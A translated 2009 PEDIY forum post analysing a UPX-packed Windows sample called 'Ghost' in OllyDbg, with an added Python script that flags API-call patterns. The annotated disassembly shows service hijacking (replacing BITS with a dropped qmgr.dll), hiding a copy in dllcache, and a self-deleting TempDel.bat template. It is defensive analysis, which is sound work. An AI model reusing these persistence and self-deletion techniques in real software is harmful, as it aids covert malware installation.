【Title】: Ghost virus analysis
【Author】: 我是土匪
【Author's e-mail】: lwzy-crack@163.com
【Author's homepage】: http://lwzy-crack.blog.163.com
【Download】: uploaded as an attachment.
【Packer】: UPX
【Language】: Microsoft Visual C++ 6.0
【Tools】: PEiD, OllyDbg
【Platform】: XP SP2
【Author's note】: Just out of interest, no other purpose. Corrections from the experts are welcome!
--------------------------------------------------------------------------------
【Detailed process】
Because I am a real beginner, please point out my mistakes so that we can improve together. Thank you. I am grateful to the PEDIY forum for teaching me many things that cannot be learned from books.
Checking the packer with PEiD shows UPX -> www.upx.sourceforge.net *
Unpacked with the ESP law; not repeated here.
After reaching the OEP:
00401C7E 55 PUSH EBP ; (Initial CPU selection)
00401C7F 8BEC MOV EBP,ESP
00401C81 6A FF PUSH -1
00401C83 68 40214000 PUSH Ghost.00402140
00401C88 68 001E4000 PUSH Ghost.00401E00 ; JMP to msvcrt._except_handler3
00401C8D 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
00401C93 50 PUSH EAX
00401C94 64:8925 0000000>MOV DWORD PTR FS:[0],ESP
Resolving the addresses of the required functions
00401000 55 PUSH EBP
00401001 8BEC MOV EBP,ESP
00401003 81EC C00B0000 SUB ESP,0BC0
00401009 8365 E4 00 AND DWORD PTR SS:[EBP-1C],0
0040100D 8365 F8 00 AND DWORD PTR SS:[EBP-8],0
00401011 8365 E8 00 AND DWORD PTR SS:[EBP-18],0
00401015 8365 EC 00 AND DWORD PTR SS:[EBP-14],0
00401019 83A5 B4FEFFFF 0>AND DWORD PTR SS:[EBP-14C],0
00401020 8365 F0 00 AND DWORD PTR SS:[EBP-10],0
00401024 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
00401028 8365 E0 00 AND DWORD PTR SS:[EBP-20],0
0040102C FF15 0C214000 CALL DWORD PTR DS:[40210C] ; user32.GetInputState
00401032 6A 00 PUSH 0
00401034 6A 00 PUSH 0
00401036 6A 00 PUSH 0
00401038 FF15 4C204000 CALL DWORD PTR DS:[40204C] ; kernel32.GetCurrentThreadId
0040103E 50 PUSH EAX
0040103F FF15 10214000 CALL DWORD PTR DS:[402110] ; user32.PostThreadMessageA
00401045 6A 00 PUSH 0
00401047 6A 00 PUSH 0
00401049 6A 00 PUSH 0
0040104B 8D45 C4 LEA EAX,DWORD PTR SS:[EBP-3C]
0040104E 50 PUSH EAX
0040104F FF15 14214000 CALL DWORD PTR DS:[402114] ; user32.GetMessageA
00401055 68 E8224000 PUSH Ghost.004022E8 ; shell32.dll
0040105A FF15 AC204000 CALL DWORD PTR DS:[4020AC] ; kernel32.LoadLibraryA
00401060 8985 B4FEFFFF MOV DWORD PTR SS:[EBP-14C],EAX
00401066 68 F4224000 PUSH Ghost.004022F4 ; ShellExecuteA
0040106B FFB5 B4FEFFFF PUSH DWORD PTR SS:[EBP-14C] ; hModule of shell32
00401071 FF15 A4204000 CALL DWORD PTR DS:[4020A4] ; kernel32.GetProcAddress
00401077 A3 D0314000 MOV DWORD PTR DS:[4031D0],EAX ; save the address of ShellExecuteA
0040107C 68 04234000 PUSH Ghost.00402304 ; Advapi32.dll
00401081 FF15 AC204000 CALL DWORD PTR DS:[4020AC] ; kernel32.LoadLibraryA
00401087 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX
0040108A 68 14234000 PUSH Ghost.00402314 ; OpenSCManagerA
0040108F FF75 F0 PUSH DWORD PTR SS:[EBP-10] ; hModule of Advapi32.dll
00401092 FF15 A4204000 CALL DWORD PTR DS:[4020A4] ; kernel32.GetProcAddress
00401098 A3 CC314000 MOV DWORD PTR DS:[4031CC],EAX
0040109D 68 04010000 PUSH 104
004010A2 6A 00 PUSH 0
004010A4 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
004010AA 50 PUSH EAX
004010AB E8 C80B0000 CALL Ghost.00401C78 ; JMP to msvcrt.memset
004010B0 83C4 0C ADD ESP,0C
004010B3 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
004010B9 50 PUSH EAX
004010BA E8 E8080000 CALL Ghost.004019A7 ; CreateEventA
Step into CALL Ghost.004019A7
-----------------------------------
004019A7 55 PUSH EBP
004019A8 8BEC MOV EBP,ESP
004019AA 83EC 18 SUB ESP,18
004019AD 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
004019B1 FF15 84204000 CALL DWORD PTR DS:[402084] ; kernel32.GetCommandLineA
004019B7 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX
004019BA 6A 20 PUSH 20
004019BC FF75 E8 PUSH DWORD PTR SS:[EBP-18]
004019BF FF15 D0204000 CALL DWORD PTR DS:[4020D0] ; msvcrt.strrchr
004019C5 59 POP ECX
004019C6 59 POP ECX
004019C7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
004019CA 837D F8 00 CMP DWORD PTR SS:[EBP-8],0
004019CE 74 54 JE SHORT Ghost.00401A24
004019D0 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
004019D3 40 INC EAX
004019D4 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
004019D7 FF75 F8 PUSH DWORD PTR SS:[EBP-8]
004019DA FF15 64204000 CALL DWORD PTR DS:[402064] ; kernel32.lstrlenA
004019E0 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX
004019E3 837D F0 01 CMP DWORD PTR SS:[EBP-10],1
004019E7 7E 0B JLE SHORT Ghost.004019F4
004019E9 837D F0 07 CMP DWORD PTR SS:[EBP-10],7
004019ED 7D 05 JGE SHORT Ghost.004019F4
004019EF E8 1CFFFFFF CALL Ghost.00401910
004019F4 837D F0 06 CMP DWORD PTR SS:[EBP-10],6
004019F8 7E 2A JLE SHORT Ghost.00401A24
004019FA C745 FC 0100000>MOV DWORD PTR SS:[EBP-4],1
00401A01 FF75 F8 PUSH DWORD PTR SS:[EBP-8]
00401A04 FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A07 FF15 3C204000 CALL DWORD PTR DS:[40203C] ; kernel32.lstrcpyA
00401A0D 68 80000000 PUSH 80
00401A12 FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A15 FF15 A8204000 CALL DWORD PTR DS:[4020A8] ; kernel32.SetFileAttributesA
00401A1B FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A1E FF15 40204000 CALL DWORD PTR DS:[402040] ; kernel32.DeleteFileA
-----------------------------------
Create the event
00401A28 68 A0244000 PUSH Ghost.004024A0 ; 4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B
00401A2D 6A 00 PUSH 0
00401A2F 6A 01 PUSH 1
00401A31 6A 00 PUSH 0
00401A33 FF15 90204000 CALL DWORD PTR DS:[402090] ; kernel32.CreateEventA
00401A39 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
00401A3C 837D F4 00 CMP DWORD PTR SS:[EBP-C],0
00401A40 74 0D JE SHORT Ghost.00401A4F
00401A42 FF15 9C204000 CALL DWORD PTR DS:[40209C] ; ntdll.RtlGetLastWin32Error
00401A48 3D B7000000 CMP EAX,0B7
00401A4D 75 7A JNZ SHORT Ghost.00401AC9
--------------------------------------------------------------
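The three behaviours just walked through (resolving ShellExecuteA and OpenSCManagerA at run time through GetProcAddress, the command-line branch that clears attributes and deletes a file, and the named event whose GetLastError result is compared against 0xB7 = ERROR_ALREADY_EXISTS as a single-instance guard) are all visible purely as API-call sequences in the OllyDbg listing. As an added example that is not part of the original post, the Python below parses listing lines in exactly this format and flags those three sequences; the sample input is a constructed subset of the lines above, and the window sizes (4 rows back for the argument pushes, 5 rows ahead for the return-value check) are assumptions chosen to fit this listing.

```python
import re
from dataclasses import dataclass

# Constructed sample: lines copied from the OllyDbg listing in this post
# (dynamic API resolution, the self-delete branch, the named event).
LISTING = """\
00401055 68 E8224000 PUSH Ghost.004022E8 ; shell32.dll
0040105A FF15 AC204000 CALL DWORD PTR DS:[4020AC] ; kernel32.LoadLibraryA
00401066 68 F4224000 PUSH Ghost.004022F4 ; ShellExecuteA
0040106B FFB5 B4FEFFFF PUSH DWORD PTR SS:[EBP-14C] ; hModule of shell32
00401071 FF15 A4204000 CALL DWORD PTR DS:[4020A4] ; kernel32.GetProcAddress
004019FA C745 FC 0100000>MOV DWORD PTR SS:[EBP-4],1
00401A0D 68 80000000 PUSH 80
00401A12 FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A15 FF15 A8204000 CALL DWORD PTR DS:[4020A8] ; kernel32.SetFileAttributesA
00401A1B FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401A1E FF15 40204000 CALL DWORD PTR DS:[402040] ; kernel32.DeleteFileA
00401A28 68 A0244000 PUSH Ghost.004024A0 ; 4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B
00401A2D 6A 00 PUSH 0
00401A2F 6A 01 PUSH 1
00401A31 6A 00 PUSH 0
00401A33 FF15 90204000 CALL DWORD PTR DS:[402090] ; kernel32.CreateEventA
00401A39 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
00401A3C 837D F4 00 CMP DWORD PTR SS:[EBP-C],0
00401A40 74 0D JE SHORT Ghost.00401A4F
00401A42 FF15 9C204000 CALL DWORD PTR DS:[40209C] ; ntdll.RtlGetLastWin32Error
00401A48 3D B7000000 CMP EAX,0B7
"""

@dataclass
class Row:
    addr: int
    mnemonic: str
    operands: str
    comment: str

# Opcode-bytes token: hex groups, possibly "seg:off" (64:A1), possibly cut
# off by OllyDbg's column width with a trailing ">".
BYTES_TOKEN = re.compile(r"[0-9A-F]+(?::[0-9A-F]+)*>?")

def _is_opcode_bytes(tok):
    """Even-length hex tokens are bytes; odd length keeps ADD from being eaten."""
    if not BYTES_TOKEN.fullmatch(tok):
        return False
    return tok.endswith(">") or all(len(s) % 2 == 0 for s in tok.split(":"))

def parse_listing(text):
    """Split each line into address, mnemonic, operands and the ';' comment."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        ins, _, cmt = line.partition(";")
        ins = re.sub(r">(?=\S)", "> ", ins)   # un-fuse "0100000>MOV"
        toks = ins.split()
        i = 1
        while i < len(toks) - 1 and _is_opcode_bytes(toks[i]):
            i += 1
        rows.append(Row(int(toks[0], 16), toks[i], " ".join(toks[i + 1:]), cmt.strip()))
    return rows

def called_api(row):
    """API name a CALL resolves to, taken from OllyDbg's comment column."""
    if row.mnemonic != "CALL" or not row.comment:
        return None
    return row.comment.split()[-1].rsplit(".", 1)[-1]

def find_patterns(rows):
    """Flag the behaviours the analysis points out, by API-call sequence."""
    findings = []
    for i, r in enumerate(rows):
        api = called_api(r)
        if api is None:
            continue
        back = rows[max(0, i - 4):i]      # argument pushes (assumed window)
        ahead = rows[i + 1:i + 6]         # return-value handling (assumed window)
        if api == "GetProcAddress":
            names = [b.comment for b in back
                     if b.mnemonic == "PUSH" and re.fullmatch(r"\w+", b.comment)]
            if names:
                findings.append(f"{r.addr:08X}: resolves {names[-1]} at run time via GetProcAddress")
        elif api == "DeleteFileA":
            if any(called_api(b) == "SetFileAttributesA" for b in back):
                findings.append(f"{r.addr:08X}: clears file attributes, then deletes the file")
        elif api == "CreateEventA":
            names = [b.comment for b in back if b.mnemonic == "PUSH" and b.comment]
            checks_exists = (any(called_api(a) in ("RtlGetLastWin32Error", "GetLastError") for a in ahead)
                             and any(a.mnemonic == "CMP" and a.operands.endswith(",0B7") for a in ahead))
            if names and checks_exists:
                findings.append(f"{r.addr:08X}: single-instance guard on named event {names[-1]} "
                                "(ERROR_ALREADY_EXISTS = 0xB7)")
    return findings

if __name__ == "__main__":
    for finding in find_patterns(parse_listing(LISTING)):
        print(finding)
```

Run stand-alone it prints one line per finding; the GUID-named event in particular is the kind of host artifact worth recording, since a second copy of the sample will find the event already present and take the 0xB7 branch.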
Get the system directory, then connect to the service control manager and open its database
004010BF 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
004010C2 68 04010000 PUSH 104
004010C7 6A 00 PUSH 0
004010C9 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
004010CE E8 A50B0000 CALL Ghost.00401C78 ; JMP to msvcrt.memset
004010D3 83C4 0C ADD ESP,0C
004010D6 68 04010000 PUSH 104
004010DB 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
004010E0 FF15 7C204000 CALL DWORD PTR DS:[40207C] ; kernel32.GetWindowsDirectoryA
004010E6 68 24234000 PUSH Ghost.00402324 ; \system32
004010EB 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
004010F0 FF15 94204000 CALL DWORD PTR DS:[402094] ; kernel32.lstrcatA
004010F6 68 3F000F00 PUSH 0F003F
004010FB 6A 00 PUSH 0
004010FD 6A 00 PUSH 0
004010FF FF15 CC314000 CALL DWORD PTR DS:[4031CC] ; advapi32.OpenSCManagerA
00401105 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
00401108 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
0040110B 50 PUSH EAX
0040110C 6A 01 PUSH 1
0040110E 6A 00 PUSH 0
00401110 68 30234000 PUSH Ghost.00402330 ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
00401115 68 02000080 PUSH 80000002
0040111A FF15 0C204000 CALL DWORD PTR DS:[40200C] ; advapi32.RegOpenKeyExA
00401120 68 00040000 PUSH 400
00401125 6A 00 PUSH 0
00401127 8D85 B0FAFFFF LEA EAX,DWORD PTR SS:[EBP-550]
0040112D 50 PUSH EAX
0040112E E8 450B0000 CALL Ghost.00401C78 ; JMP to msvcrt.memset
-------------------------------------
Drop qmgr.dll, set its file attributes and timestamps, replace the BITS service, and start qmgr.dll as a service
004012E5 50 PUSH EAX
004012E6 E8 06030000 CALL Ghost.004015F1 ; drop qmgr.dll, set file attributes and timestamps
004012EB 85C0 TEST EAX,EAX
004012ED 75 04 JNZ SHORT Ghost.004012F3 ; if successful, start the service; otherwise terminate the program
004012EF EB 30 JMP SHORT Ghost.00401321
004012F1 EB 2E JMP SHORT Ghost.00401321
004012F3 6A 00 PUSH 0
004012F5 6A 00 PUSH 0
004012F7 FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004012FA FF15 14204000 CALL DWORD PTR DS:[<&advapi32.StartServi>; advapi32.StartServiceA
00401300 85C0 TEST EAX,EAX
00401302 75 04 JNZ SHORT Ghost.00401308
00401304 EB 1B JMP SHORT Ghost.00401321
00401306 EB 19 JMP SHORT Ghost.00401321
00401308 FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040130B FF15 28204000 CALL DWORD PTR DS:[<&advapi32.CloseServi>; advapi32.CloseServiceHandle
00401311 FF75 FC PUSH DWORD PTR SS:[EBP-4]
00401314 FF15 28204000 CALL DWORD PTR DS:[<&advapi32.CloseServi>; advapi32.CloseServiceHandle
0040131A 6A 01 PUSH 1
0040131C E8 6E040000 CALL Ghost.0040178F
00401321 FF75 E0 PUSH DWORD PTR SS:[EBP-20]
00401324 FF15 28204000 CALL DWORD PTR DS:[<&advapi32.CloseServi>; advapi32.CloseServiceHandle
--------------------------------------
===========================================================
0040131C E8 6E040000 CALL Ghost.0040178F ; cleanup work
Having done its dirty work, it cleans up after itself: a batch file "TempDel.bat" is generated in the temp directory:
0040178F 55 PUSH EBP
00401790 8BEC MOV EBP,ESP
00401792 81EC 28070000 SUB ESP,728
00401798 838D ECFEFFFF F>OR DWORD PTR SS:[EBP-114],FFFFFFFF
0040179F 68 04010000 PUSH 104
004017A4 6A 00 PUSH 0
004017A6 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004017AC 50 PUSH EAX
004017AD E8 C6040000 CALL Ghost.00401C78 ; JMP to msvcrt.memset
004017B2 83C4 0C ADD ESP,0C
004017B5 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004017BB 50 PUSH EAX
004017BC 68 04010000 PUSH 104
004017C1 FF15 44204000 CALL DWORD PTR DS:[402044] ; kernel32.GetTempPathA
004017C7 68 08244000 PUSH Ghost.00402408 ; TempDel.bat
004017CC 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004017D2 50 PUSH EAX
004017D3 FF15 94204000 CALL DWORD PTR DS:[402094] ; kernel32.lstrcatA
004017D9 68 04010000 PUSH 104
004017DE 6A 00 PUSH 0
004017E0 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
004017E6 50 PUSH EAX
004017E7 E8 8C040000 CALL Ghost.00401C78 ; JMP to msvcrt.memset
004017EC 83C4 0C ADD ESP,0C
004017EF 68 04010000 PUSH 104
004017F4 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
004017FA 50 PUSH EAX
004017FB 6A 00 PUSH 0
004017FD FF15 B0204000 CALL DWORD PTR DS:[4020B0] ; kernel32.GetModuleFileNameA
00401803 68 04010000 PUSH 104
00401808 6A 00 PUSH 0
0040180A 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
00401810 50 PUSH EAX
00401811 E8 62040000 CALL Ghost.00401C78 ; JMP to msvcrt.memset
00401816 83C4 0C ADD ESP,0C
00401819 837D 08 01 CMP DWORD PTR SS:[EBP+8],1
0040181D 75 1A JNZ SHORT Ghost.00401839
0040181F 68 C8304000 PUSH Ghost.004030C8 ; ASCII "C:\WINDOWS\system32"
00401824 68 14244000 PUSH Ghost.00402414 ; %s\dllcache\lsasvc.dll
00401829 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
0040182F 50 PUSH EAX
00401830 FF15 08214000 CALL DWORD PTR DS:[402108] ; user32.wsprintfA
00401836 83C4 0C ADD ESP,0C
00401839 68 00040000 PUSH 400
0040183E 6A 00 PUSH 0
00401840 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
00401846 50 PUSH EAX
00401847 E8 2C040000 CALL Ghost.00401C78 ; JMP to msvcrt.memset
0040184C 83C4 0C ADD ESP,0C
0040184F 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
00401855 50 PUSH EAX
00401856 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
0040185C 50 PUSH EAX
0040185D 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
00401863 50 PUSH EAX
00401864 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
0040186A 50 PUSH EAX
0040186B 8D85 D8F8FFFF LEA EAX,DWORD PTR SS:[EBP-728]
00401871 50 PUSH EAX
00401872 68 30244000 PUSH Ghost.00402430 ; copy /Y "%s" "%s"\r\n:runagain\r\ndel "%s"\r\nif exist "%s" goto runagain\r\ndel "%s"\r\n
00401877 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
0040187D 50 PUSH EAX
0040187E FF15 08214000 CALL DWORD PTR DS:[402108] ; user32.wsprintfA
00401884 83C4 1C ADD ESP,1C
00401887 6A 00 PUSH 0
00401889 68 80000000 PUSH 80
0040188E 6A 02 PUSH 2
00401890 6A 00 PUSH 0
00401892 6A 00 PUSH 0
00401894 68 000000C0 PUSH C0000000
00401899 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
0040189F 50 PUSH EAX
004018A0 FF15 54204000 CALL DWORD PTR DS:[402054] ; kernel32.CreateFileA
004018A6 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX
004018AC 83BD ECFEFFFF F>CMP DWORD PTR SS:[EBP-114],-1
004018B3 75 02 JNZ SHORT Ghost.004018B7
004018B5 EB 55 JMP SHORT Ghost.0040190C
004018B7 6A 00 PUSH 0
004018B9 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004018BC 50 PUSH EAX
004018BD 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
004018C3 50 PUSH EAX
004018C4 FF15 64204000 CALL DWORD PTR DS:[402064] ; kernel32.lstrlenA
004018CA 50 PUSH EAX
004018CB 8D85 E0F9FFFF LEA EAX,DWORD PTR SS:[EBP-620]
004018D1 50 PUSH EAX
004018D2 FFB5 ECFEFFFF PUSH DWORD PTR SS:[EBP-114]
004018D8 FF15 80204000 CALL DWORD PTR DS:[402080] ; kernel32.WriteFile
004018DE FFB5 ECFEFFFF PUSH DWORD PTR SS:[EBP-114]
004018E4 FF15 48204000 CALL DWORD PTR DS:[402048] ; kernel32.CloseHandle
004018EA 6A 00 PUSH 0
004018EC 6A 00 PUSH 0
004018EE 6A 00 PUSH 0
004018F0 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
004018F6 50 PUSH EAX
004018F7 68 80244000 PUSH Ghost.00402480 ; open
004018FC 6A 00 PUSH 0
004018FE FF15 D0314000 CALL DWORD PTR DS:[4031D0] ; shell32.ShellExecuteA
00401904 6A 00 PUSH 0
00401906 FF15 50204000 CALL DWORD PTR DS:[402050] ; kernel32.ExitProcess
0040190C C9 LEAVE
0040190D C2 0400 RETN 4
VirusTotal scan result: http://www.virustotal.com/zh-cn/analisis/947d1ed74bfcf7c253ae99c09cf2afee6c16da34a234f91c6d769199bb3af1aa-1255189745
I have only managed a rough analysis and do not know what this thing actually does; many antivirus products flag it. Could an expert give me some pointers?
--------------------------------------------------------------------------------
【Copyright】: This article is from the PEDIY forum (看雪论坛); when reposting, please credit the author and keep the article intact. Thank you!
10 October 2009, 23:44:23